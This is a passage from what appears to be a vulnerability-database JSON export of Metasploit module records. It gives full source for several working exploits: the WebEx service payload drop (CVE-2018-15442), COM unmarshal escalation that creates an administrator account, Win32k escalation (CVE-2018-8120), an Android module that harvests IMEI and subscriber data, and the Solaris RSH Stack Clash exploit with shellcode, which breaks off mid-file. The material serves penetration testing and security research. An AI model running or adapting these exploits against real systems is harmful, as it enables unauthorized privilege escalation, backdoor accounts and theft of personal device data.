Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: datastore['SMBDomain']\n })\n end\n\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\n credential_data.merge!({:private_type => :ntlm_hash})\n else\n credential_data.merge!({:private_type => :password})\n end\n\n credential_data.merge!(service_data)\n\n credential_core = create_credential(credential_data)\n\n login_data = {\n access_level: 'Admin',\n core: credential_core,\n last_attempted_at: DateTime.now,\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n }\n\n login_data.merge!(service_data)\n create_credential_login(login_data)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/webexec.rb"}, {"lastseen": "2019-11-30T00:36:45", "bulletinFamily": "exploit", "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, can be used to run arbitrary commands locally, and can be started by limited users in default installations.\n", "modified": "2018-10-24T21:13:47", "published": "2018-10-23T20:51:23", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/WEBEXEC", "href": "", "type": "metasploit", "title": "WebEx Local Service Permissions Exploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::Accounts\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'WebEx Local Service Permissions Exploit',\n 'Description' => %q{\n This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.\n },\n 'References' =>\n [\n ['URL', 'https://webexec.org'],\n ['CVE', '2018-15442']\n ],\n 'DisclosureDate' => \"Oct 09 2018\",\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>'\n ],\n 'Platform' => [ 'win'],\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'SessionTypes' => [ \"meterpreter\" ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n 'ReverseConnectRetries' => 255\n },\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptString.new(\"DIR\", [ false, \"Specify a directory to plant the EXE.\", \"%SystemRoot%\\\\Temp\"])\n ])\n @service_name = 'webexservice'\n end\n\n def validate_arch\n return target unless target.name == 'Automatic'\n\n case sysinfo['Architecture']\n when 'x86'\n fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64'\n vprint_status('Detected x86 system')\n return targets[1]\n when 'x64'\n vprint_status('Detected x64 system')\n return targets[2]\n end\n end\n\n def check_service_exists?(service)\n srv_info = service_info(service)\n\n if srv_info.nil?\n vprint_warning(\"Unable to enumerate services.\")\n return false\n end\n\n if srv_info && srv_info[:display].empty?\n vprint_warning(\"Service #{service} does not exist.\")\n return false\n else\n return true\n end\n end\n\n def check\n unless check_service_exists?(@service_name)\n return Exploit::CheckCode::Safe\n end\n\n srv_info = service_info(@service_name)\n\n vprint_status(srv_info.to_s)\n\n case START_TYPE[srv_info[:starttype]]\n when 'Disabled'\n vprint_error(\"Service startup is Disabled, so will be unable to exploit unless account has correct permissions...\")\n return Exploit::CheckCode::Safe\n when 'Manual'\n vprint_error(\"Service startup is Manual, so will be unable to exploit unless account has correct permissions...\")\n return Exploit::CheckCode::Safe\n when 'Auto'\n vprint_good(\"Service is set to Automatically start...\")\n end\n\n if check_search_path\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Appears\n end\n\n def check_write_access(path)\n perm = check_dir_perms(path, @token)\n if perm and perm.include?('W')\n print_good(\"Write permissions in #{path} - #{perm}\")\n return true\n elsif perm\n vprint_status (\"Permissions for #{path} - #{perm}\")\n else\n vprint_status (\"No permissions for #{path}\")\n end\n\n return false\n end\n\n\n def exploit\n begin\n @token = get_imperstoken\n rescue Rex::Post::Meterpreter::RequestError\n vprint_error(\"Error while using get_imperstoken: #{e}\")\n end\n\n fail_with(Failure::Unknown, \"Unable to retrieve token.\") unless @token\n\n if is_system?\n fail_with(Failure::Unknown, \"Current user is already SYSTEM, aborting.\")\n end\n\n print_status(\"Checking service exists...\")\n if !check_service_exists?(@service_name)\n fail_with(Failure::NoTarget, \"The service doesn't exist.\")\n end\n\n if is_uac_enabled?\n print_warning(\"UAC is enabled, may get false negatives on writable folders.\")\n end\n\n # Use manually selected Dir\n file_path = datastore['DIR']\n\n @exe_file_name = Rex::Text.rand_text_alphanumeric(8)\n @exe_file_path = \"#{file_path}\\\\#{@exe_file_name}.exe\"\n\n service_information = service_info(@service_name)\n\n # Check architecture\n valid_arch = validate_arch\n exe = generate_payload_exe(:arch => valid_arch.arch)\n\n #\n # Drop the malicious executable into the path\n #\n print_status(\"Writing #{exe.length.to_s} bytes to #{@exe_file_path}...\")\n begin\n write_file(@exe_file_path, exe)\n register_file_for_cleanup(@exe_file_path)\n rescue Rex::Post::Meterpreter::RequestError => e\n # Can't write the file, can't go on\n fail_with(Failure::Unknown, e.message)\n end\n\n #\n # Run the service\n #\n print_status(\"Launching service...\")\n res = cmd_exec(\"cmd.exe\",\n \"/c sc start webexservice install software-update 1 #{@exe_file_path}\")\n\n if service_restart(@service_name)\n print_status(\"Service started...\")\n else\n service_information = service_info(@service_name)\n if service_information[:starttype] == START_TYPE_AUTO\n if job_id\n print_status(\"Unable to start service, handler running waiting for a reboot...\")\n while(true)\n break if session_created?\n select(nil,nil,nil,1)\n end\n else\n fail_with(Failure::Unknown, \"Unable to start service, use exploit -j to run as a background job and wait for a reboot...\")\n end\n else\n fail_with(Failure::Unknown, \"Unable to start service, and it does not auto start, cleaning up...\")\n end\n end\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/webexec.rb"}, {"lastseen": "2019-11-27T08:37:08", "bulletinFamily": "exploit", "description": "This module exploits a local privilege escalation bug which exists in microsoft COM for windows when it fails to properly handle serialized objects.\n", "modified": "2019-09-24T11:15:43", "published": "2018-10-19T23:15:44", "id": "MSF:POST/WINDOWS/ESCALATE/UNMARSHAL_CMD_EXEC", "href": "", "type": "metasploit", "title": "Windows unmarshal post exploitation", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::File\n# include Msf::Post::Windows::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows unmarshal post exploitation',\n 'Description' => %q{\n This module exploits a local privilege escalation bug which exists\n in microsoft COM for windows when it fails to properly handle serialized objects.},\n 'References' =>\n [\n ['CVE', '2018-0824'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],\n ['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],\n ['EDB', '44906']\n ],\n 'Author' =>\n [\n 'Nicolas Joly', # Vulnerability discovery\n 'Matthias Kaiser', # Exploit PoC\n 'Sanjay Gondaliya', # Modified PoC\n 'Pratik Shah <pratik@notsosecure.com>' # Metasploit module\n ],\n 'DisclosureDate' => 'Aug 05 2018',\n 'Platform' => ['win'],\n 'Arch' => ARCH_X64,\n 'License' => MSF_LICENSE,\n ))\n\n register_options(\n [\n OptString.new('COMMAND',\n [false, 'The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).', nil]),\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\n OptString.new('SCRIPT_NAME',\n [false, 'The filename to use for the COM script file (%RAND% by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\n ])\n end\n\n def setup\n super\n validate_active_host\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\n @script_name = \"#{script_name}.sct\" unless script_name.match(/\\.sct$/i)\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n @script_path = \"#{temp_path}\\\\#{script_name}\"\n end\n\n def populate_command\n username = Rex::Text.rand_text_alpha((rand(8) + 6))\n password = Rex::Text.rand_text_alpha((rand(8) + 6))\n print_status(\"username = #{username}, password = #{password}\")\n cmd_to_run = 'net user /add ' + username + ' ' + password\n cmd_to_run += ' & net localgroup administrators /add ' + username\n print_status(cmd_to_run)\n return cmd_to_run\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_remote_path(path)\n unless directory?(path)\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def ensure_clean_destination(path)\n if file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_error(\"Unable to delete #{path}\")\n end\n end\n end\n\n def upload_exploit\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')\n upload_file(exploit_path, local_exploit_path)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n end\n\n def upload_script(cmd_to_run)\n vprint_status(\"Creating the sct file with command #{cmd_to_run}\")\n local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')\n script_template_data = ::IO.read(local_script_template_path)\n vprint_status(\"script_template_data.length = #{script_template_data.length}\")\n full_command = 'cmd.exe /c ' + cmd_to_run\n full_command = full_command\n script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)\n if script_data == nil\n fail_with(Failure::BadConfig, \"Failed to substitute command in script_template\")\n end\n vprint_status(\"Writing #{script_data.length} bytes to #{script_path} to target\")\n write_file(script_path, script_data)\n vprint_status('Script uploaded successfully')\n end\n\n def run\n if datastore['COMMAND'].nil?\n cmd_to_run = populate_command\n else\n cmd_to_run = datastore['COMMAND']\n end\n print_status(\"exploit path is: #{exploit_path}\")\n print_status(\"script path is: #{script_path}\")\n print_status(\"command is: #{cmd_to_run}\")\n begin\n validate_active_host\n validate_target\n validate_remote_path(temp_path)\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n vprint_status(\"Uploading Script to #{script_path}\")\n upload_script(cmd_to_run)\n vprint_status(\"Uploading Exploit to #{exploit_path}\")\n upload_exploit\n vprint_status('Launching Exploit...')\n command_output = cmd_exec(exploit_path + ' ' + script_path)\n vprint_status(command_output)\n print_good('Exploit Completed')\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_good('Command failed, cleaning up')\n print_error(e.message)\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n end\n end\n attr_reader :exploit_name\n attr_reader :script_name\n attr_reader :temp_path\n attr_reader :exploit_path\n attr_reader :script_path\nend\n\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/escalate/unmarshal_cmd_exec.rb"}, {"lastseen": "2019-11-19T02:24:32", "bulletinFamily": "exploit", "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.\n", "modified": "2018-10-18T19:30:20", "published": "2018-10-10T19:41:14", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS18_8120_WIN32K_PRIVESC", "href": "", "type": "metasploit", "title": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',\n 'Description' => %q{\n This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'unamer', # Exploit PoC\n 'bigric3', # Analysis and exploit\n 'Anton Cherepanov', # Vulnerability discovery\n 'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit\n ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Automatic', {} ],\n [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'Payload' => {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' => [\n ['BID', '104034'],\n ['CVE', '2018-8120'],\n ['URL', 'https://github.com/unamer/CVE-2018-8120'],\n ['URL', 'https://github.com/bigric3/cve-2018-8120'],\n ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']\n ],\n 'DisclosureDate' => 'May 9 2018',\n 'DefaultTarget' => 0\n ))\n end\n\n def assign_target\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['OS'] =~ /XP|NT/i\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n\n return target unless target.name == 'Automatic'\n\n case sysinfo['Architecture']\n when 'x64'\n vprint_status('Targeting x64 system')\n return targets[1]\n when 'x86'\n fail_with(Failure::BadConfig, \"Invalid payload architecture\") if payload_instance.arch.first == ARCH_X64\n vprint_status('Targeting x86 system')\n return targets[2]\n end\n end\n\n def write_file_to_target(fname, data)\n tempdir = session.sys.config.getenv('TEMP')\n file_loc = \"#{tempdir}\\\\#{fname}\"\n vprint_warning(\"Attempting to write #{fname} to #{tempdir}\")\n write_file(file_loc, data)\n vprint_good(\"#{fname} written\")\n file_loc\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n fail_with(Failure::Unknown, \"Writing #{fname} to disk was unsuccessful\")\n end\n\n def check_arch\n sys_arch = assign_target\n if sys_arch.name =~ /x86/\n return 'CVE-2018-8120x86.exe'\n else sys_arch.name =~ /x64/\n return 'CVE-2018-8120x64.exe'\n end\n end\n\n def exploit\n cve_fname = check_arch\n rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)\n vprint_status(\"Reading payload from file #{rexe}\")\n raw = File.read(rexe)\n\n rexename = \"#{Rex::Text.rand_text_alphanumeric(10)}.exe\"\n vprint_status(\"EXE's name is: #{rexename}\")\n exe = generate_payload_exe\n tempexename = \"#{Rex::Text.rand_text_alpha(6..14)}.exe\"\n\n exe_payload = write_file_to_target(tempexename, exe)\n vprint_status(\"Payload uploaded to temp folder\")\n cve_exe = write_file_to_target(rexename, raw)\n command = \"\\\"#{cve_exe}\\\" \\\"#{exe_payload}\\\"\"\n vprint_status(\"Location of CVE-2018-8120.exe is: #{cve_exe}\")\n register_file_for_cleanup(exe_payload)\n\n vprint_status(\"Executing command : #{command}\")\n cmd_exec_get_pid(command)\n print_good('Exploit finished, wait for privileged payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms18_8120_win32k_privesc.rb"}, {"lastseen": "2019-11-05T18:22:31", "bulletinFamily": "exploit", "description": "This module displays the subscriber info stored on the target phone. It uses call service to get values of each transaction code like imei etc.\n", "modified": "2018-10-01T08:54:46", "published": "2018-10-01T08:54:46", "id": "MSF:POST/ANDROID/GATHER/SUB_INFO", "href": "", "type": "metasploit", "title": "extracts subscriber info from target device", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::Common\n include Msf::Post::Android::Priv\n include Msf::Post::Android::System\n\n def initialize(info={})\n super( update_info( info, {\n 'Name' => \"extracts subscriber info from target device\",\n 'Description' => %q{\n This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Auxilus'],\n 'SessionTypes' => [ 'meterpreter', 'shell' ],\n 'Platform' => 'android',\n }\n ))\n end\n\n def run\n unless is_root?\n print_error(\"This module requires root permissions.\")\n return\n end\n\n @transaction_codes ||= [\n 'DeviceId',\n 'DeviceIdForSubscriber',\n 'ImeiForSubscriber',\n 'DeviceSvn',\n 'SubscriberId',\n 'SubscriberIdForSubscriber',\n 'GroupIdLevel1',\n 'GroupIdLevel1ForSubscriber',\n 'IccSerialNumber',\n 'IccSerialNumberForSubscriber',\n 'Line1Number',\n 'Line1NumberForSubscriber',\n 'Line1AlphaTag',\n 'Line1AlphaTagForSubscriber',\n 'Msisdn',\n 'MsisdnForSubscriber',\n 'VoiceMailNumber',\n 'VoiceMailNumberForSubscriber',\n 'CompleteVoiceMailNumber',\n 'CompleteVoiceMailNumberForSubscriber',\n 'VoiceMailAlphaTag',\n 'VoiceMailAlphaTagForSubscriber',\n 'IsimImpi',\n 'IsimDomain',\n 'IsimImpu',\n 'IsimIst',\n 'IsimPcscf',\n 'IsimChallengeResponse',\n 'IccSimChallengeResponse'\n ]\n values ||= []\n arr ||= []\n for code in 1..@transaction_codes.length do\n print_status(\"using code : #{code}\")\n cmd = \"service call iphonesubinfo #{code}\"\n block = cmd_exec(cmd)\n value,tc = get_val(block, code)\n arr << [tc, value]\n end\n\n tc_tbl = Rex::Text::Table.new(\n 'Header' => 'Subscriber info',\n 'Indent' => 1,\n 'Columns' => ['transaction code', 'value']\n )\n\n arr.each do |a|\n tc_tbl << [\n a[0], # TRANSACTION CODE\n a[1] # value\n ]\n end\n print_line(tc_tbl.to_s)\n end\n\n def get_val(data, code)\n parsed = data.gsub(/Parcel/, '')\n string = ''\n 100.times do |i|\n next if i % 2 == 0\n str = parsed.split(\"'\")[i]\n break if str.nil?\n string += str\n end\n v = ''\n string.split(\".\").each do |chr|\n next if chr.nil? or chr == \"\\n\"\n v += chr\n end\n return v,@transaction_codes[code-1]\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/android/gather/sub_info.rb"}, {"lastseen": "2019-12-04T08:52:29", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in RSH on unpatched Solaris systems which allows users to gain root privileges. The stack guard page on unpatched Solaris systems is of insufficient size to prevent collisions between the stack and heap memory, aka Stack Clash. This module uploads and executes Qualys' Solaris_rsh.c exploit, which exploits a vulnerability in RSH to bypass the stack guard page to write to the stack and create a SUID root shell. This module has offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86). Exploitation will usually complete within a few minutes using the default number of worker threads (10). Occasionally, exploitation will fail. If the target system is vulnerable, usually re-running the exploit will be successful. This module has been tested successfully on Solaris 11.1 (x86) and Solaris 11.3 (x86).\n", "modified": "2019-01-10T19:19:14", "published": "2018-09-18T17:38:59", "id": "MSF:EXPLOIT/SOLARIS/LOCAL/RSH_STACK_CLASH_PRIV_ESC", "href": "", "type": "metasploit", "title": "Solaris RSH Stack Clash Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Solaris::Priv\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris RSH Stack Clash Privilege Escalation',\n 'Description' => %q{\n This module exploits a vulnerability in RSH on unpatched Solaris\n systems which allows users to gain root privileges.\n\n The stack guard page on unpatched Solaris systems is of\n insufficient size to prevent collisions between the stack\n and heap memory, aka Stack Clash.\n\n This module uploads and executes Qualys' Solaris_rsh.c exploit,\n which exploits a vulnerability in RSH to bypass the stack guard\n page to write to the stack and create a SUID root shell.\n\n This module has offsets for Solaris versions 11.1 (x86) and\n Solaris 11.3 (x86).\n\n Exploitation will usually complete within a few minutes using\n the default number of worker threads (10). Occasionally,\n exploitation will fail. If the target system is vulnerable,\n usually re-running the exploit will be successful.\n\n This module has been tested successfully on Solaris 11.1 (x86)\n and Solaris 11.3 (x86).\n },\n 'References' =>\n [\n ['BID', '99151'],\n ['BID', '99153'],\n ['CVE', '2017-1000364'],\n ['CVE', '2017-3629'],\n ['CVE', '2017-3630'],\n ['CVE', '2017-3631'],\n ['EDB', '42270'],\n ['URL', 'http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html'],\n ['URL', 'https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash'],\n ['URL', 'https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt']\n ],\n 'Notes' => { 'AKA' => ['Stack Clash', 'Solaris_rsh.c'] },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys Corporation', # Stack Clash technique and Solaris_rsh.c exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Jun 19 2017',\n 'Privileged' => true,\n 'Platform' => ['unix'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Solaris 11.1', {}],\n ['Solaris 11.3', {}]\n ],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/bind_netcat',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n OptInt.new('WORKERS', [true, 'Number of workers', '10']),\n OptString.new('RSH_PATH', [true, 'Path to rsh executable', '/usr/bin/rsh'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def rsh_path\n datastore['RSH_PATH']\n end\n\n def mkdir(path)\n vprint_status \"Creating '#{path}' directory\"\n cmd_exec \"mkdir -p #{path}\"\n register_dir_for_cleanup path\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c\"\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n register_file_for_cleanup path\n end\n\n def symlink(link_target, link_name)\n print_status \"Symlinking #{link_target} to #{link_name}\"\n rm_f link_name\n cmd_exec \"ln -sf #{link_target} #{link_name}\"\n register_file_for_cleanup link_name\n end\n\n def check\n unless setuid? rsh_path\n vprint_error \"#{rsh_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{rsh_path} is setuid\"\n\n unless has_gcc?\n vprint_error 'gcc is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n version = kernel_version\n if version.to_s.eql? ''\n vprint_error 'Could not determine Solaris version'\n return CheckCode::Detected\n end\n\n unless ['11.1', '11.3'].include? version\n vprint_error \"Solaris version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\n\n CheckCode::Detected\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless check == CheckCode::Detected\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n if target.name.eql? 'Automatic'\n case kernel_version\n when '11.1'\n my_target = targets[1]\n arg = 0\n when '11.3'\n my_target = targets[2]\n arg = 1\n else\n fail_with Failure::NoTarget, 'Unable to automatically select a target'\n end\n else\n my_target = target\n end\n print_status \"Using target: #{my_target.name}\"\n\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\n mkdir base_path\n\n # Solaris_rsh.c by Qualys\n # modified for Metasploit\n workers = datastore['WORKERS'].to_i\n root_shell = 'ROOT'\n shellcode = '\\x31\\xc0\\x50\\x68'\n shellcode << root_shell\n shellcode << '\\x89\\xe3\\x50\\x53\\x89\\xe2\\x50\\x50'\n shellcode << '\\x52\\x53\\xb0\\x3C\\x48\\x50\\xcd\\x91'\n shellcode << '\\x31\\xc0\\x40\\x50\\x50\\xcd\\x91Z'\n exp = <<-EOF\n/*\n * Solaris_rsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631\n * Copyright (C) 2017 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see <http://www.gnu.org/licenses/>.\n */\n\n#include <errno.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/fcntl.h>\n#include <sys/resource.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#ifndef timersub\n#define timersub(a, b, result) \\\\\n do { \\\\\n (result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \\\\\n (result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \\\\\n if ((result)->tv_usec < 0) { \\\\\n --(result)->tv_sec; \\\\\n (result)->tv_usec += 1000000; \\\\\n } \\\\\n } while (0)\n#endif\n\n#define RSH \"#{rsh_path}\"\nstatic const struct target * target;\nstatic const struct target {\n const char * name;\n size_t s_first, s_last, s_step;\n size_t l_first, l_last, l_step;\n size_t p_first, p_last, p_step;\n size_t a, b;\n size_t i, j;\n}\ntargets[] = {\n {\n .name = \"Oracle Solaris 11.1 X86 (Assembled 19 September 2012)\",\n .s_first = 16*1024, .s_last = 44*1024, .s_step = 4096,\n .l_first = 192, .l_last = 512, .l_step = 16,\n .p_first = 0, .p_last = 8192, .p_step = 1,\n .a = 0, .b = 15, .j = 12,\n .i = 0x08052608 /* pop edx; pop ebp; ret */\n },\n {\n .name = \"Oracle Solaris 11.3 X86 (Assembled 06 October 2015)\",\n .s_first = 12*1024, .s_last = 44*1024, .s_step = 4096,\n .l_first = 96, .l_last = 512, .l_step = 4,\n .p_first = 0, .p_last = 4096, .p_step = 4,\n .a = 0, .b = 3, .j = SIZE_MAX,\n .i = 0x07faa7ea /* call *0xc(%ebp) */\n },\n};\n\n#define ROOTSHELL \"#{root_shell}\"\nstatic const char shellcode[] = \"#{shellcode}\";\n\nstatic volatile sig_atomic_t sigalarm;\n\nstatic void\nsigalarm_handler(const int signum __attribute__((__unused__)))\n{\n sigalarm = 1;\n}\n\n#define die() do { \\\\\n fprintf(stderr, \"died in %s: 